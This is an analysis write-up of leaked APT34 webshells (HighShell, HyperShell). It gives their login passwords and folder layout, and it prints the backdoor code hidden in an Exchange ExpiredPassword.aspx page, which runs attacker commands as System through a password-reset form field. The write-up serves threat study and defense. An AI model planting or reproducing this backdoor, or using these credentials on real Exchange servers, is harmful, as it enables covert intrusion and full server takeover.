0x00 Preface

---

Recently, six tools from APT34 were leaked. As the second article in the analysis series, this post focuses solely on the technical analysis of HighShell and HyperShell.

References:

https://malware-research.org/apt34-hacking-tools-leak/amp/

0x01 Introduction

---

This article will cover the following:

  • Analysis of HighShell
  • Analysis of HyperShell
  • Summary

0x02 Analysis of HighShell

---

The corresponding leaked file is named HighShell in Webshells_and_Panel

The file in question is HighShell.aspx, a webshell targeting Windows servers.

The default access page is shown in the figure below.

Alt text

The login box is red and requires a connection password.

The correct password is Th!sN0tF0rFAN.

After entering the correct password, click 'Do it' and refresh the page to successfully log in, as shown in the figure below.

Alt text

The login box turns green.

Public information about this tool:

https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/

HighShell shares the same page as TwoFace mentioned in the Palo Alto Networks article.

0x03 Analysis of HyperShell

---

The corresponding leaked file is named HyperShell in the Webshells_and_Panel folder.

It contains the following 7 subfolders:

  1. ExpiredPasswordTech
  2. HyperShell
  3. Image
  4. Libraries
  5. packages
  6. ShellLocal
  7. StableVersion

1.ExpiredPasswordTech

Includes 3 files:

  • error4.aspx, same functionality as HighShell.aspx but with unknown login credentials
  • ExpiredPassword.aspx, webshell for Exchange
  • MyMaster.aspx, generates string: NxKK7a

2.HyperShell

Contains multiple files, source code files for various webshells

Includes another usable webshell, relative path: .\Webshells_and_Panel\HyperShell\HyperShell\Shell\simple.aspx

Connection password: MkRg5dm8MOk

As shown in the figure below

Alt text

3.Image

Image folder

4.Libraries

Contains multiple dependency files

5.packages

Contains multiple dependency files

6. ShellLocal

Empty folder

7. StableVersion

Stable version, contains multiple webshells

(1)ExpiredPassword.aspx

Webshell for Exchange

Relative path: .\Webshells_and_Panel\HyperShell\StableVersion\HighShell v5.0\HyperShell\HyperShell\ExpiredPasswordTech

Same content as the file at relative path .\Webshells_and_Panel\HyperShell\ExpiredPasswordTech

ExpiredPassword.aspx is a normal Exchange function, corresponding to the page for resetting user passwords, as shown in the figure below

Alt text

Accessed URL: https:///owa/auth/ExpiredPassword.aspx

Corresponding Windows absolute path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\ExpiredPassword.aspx

The default permission of the webshell at this path is System

My test system has Exchange 2013 installed. I have uploaded the normal ExpiredPassword.aspx source code to GitHub:

https://raw.githubusercontent.某开源项目.aspx(2013)

The ExpiredPassword.aspx in HyperShell is a file with backdoor code added. Compared to the normal ExpiredPassword.aspx file in my test environment, there are multiple differences, as shown in the figure below

Alt text

After analysis, it may be due to differences in Exchange versions. Ignoring version differences, the main code added in HyperShell's ExpiredPassword.aspx is as follows:

<%
try{
if (Convert.ToBase64String(new System.Security.Cryptography.SHA1Managed().ComputeHash(Encoding.ASCII.GetBytes(Encoding.ASCII.GetString(Convert.FromBase64String(Request.Form["newPwd1"])) + "reDGEa@#!%FS"))) == "+S6Kos9D/etq1cd///fgTarVnUQ=")
{
System.Diagnostics.Process p = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo i = p.StartInfo;
i.FileName = "cmd";
i.Arguments = "/c " + Encoding.UTF8.GetString(Convert.FromBase64String(Request.Form["newPwd2"]));
i.UseShellExecute = false;
i.CreateNoWindow = true;
i.RedirectStandardOutput = true;
p.Start();
string r = p.StandardOutput.ReadToEnd();
p.WaitForExit();
p.Close();
Response.Write("

" + Server.HtmlEncode(r) + "
");
Response.End();
}}catch{}
%>

Corresponding to my test environment, which is Exchange 2013, the code with payload added and verification steps removed has been uploaded to GitHub:

https://raw.githubusercontent.某开源项目.aspx(2013)(HyperShell)

The 'Confirm new password' field is used to pass the command to be executed, with System privileges

(2) HighShellLocal

A powerful webshell

Relative path: .\Webshells_and_Panel\Webshells_and_Panel\HyperShell\StableVersion\HighShell v5.0\HyperShell\HyperShell\ShellLocal\StableVersions\ShellLocal-v8.8.5.rar

Extract to the current directory, relative path is .\ShellLocal-v8.8.5\ShellLocal-v8.8.5\HighShellLocal, including the following files:

  • Folder css
  • Folder files
  • Folder js
  • HighShellLocal.aspx

For actual use, the bin folder under .\ShellLocal-v8.8.5\ShellLocal-v8.8.5\ is also required, otherwise a Json usage error will be prompted

The complete structure is as follows:

│ HighShellLocal.aspx

├───bin
│ Newtonsoft.Json.dll

├───css
│ │ main.css
│ │
│ └───img
│ box-zipper.png
│ download-cloud.png
│ exclamation-diamond.png
│ heart-break.png
│ heart-empty.png
│ heart.png
│ minus-button.png

├───files
│ 7za.exe
│ nbt.exe
│ rx.exe

└───js
│ explorer.js
│ main.js
│ send.js
│ utility.js

├───components

├───jquery

└───semantic

Login password: Th!sN0tF0rFAN

The login page is shown in the following figure

Alt text

After entering the correct login password, as shown below

Alt text

It can be seen that this webshell supports multiple functions

0x04 Summary

---

This article analyzes HighShell and HyperShell from the leaked files. The ExpiredPassword.aspx in HyperShell is a relatively concealed webshell. So far, I have not found this exploitation method in publicly available materials.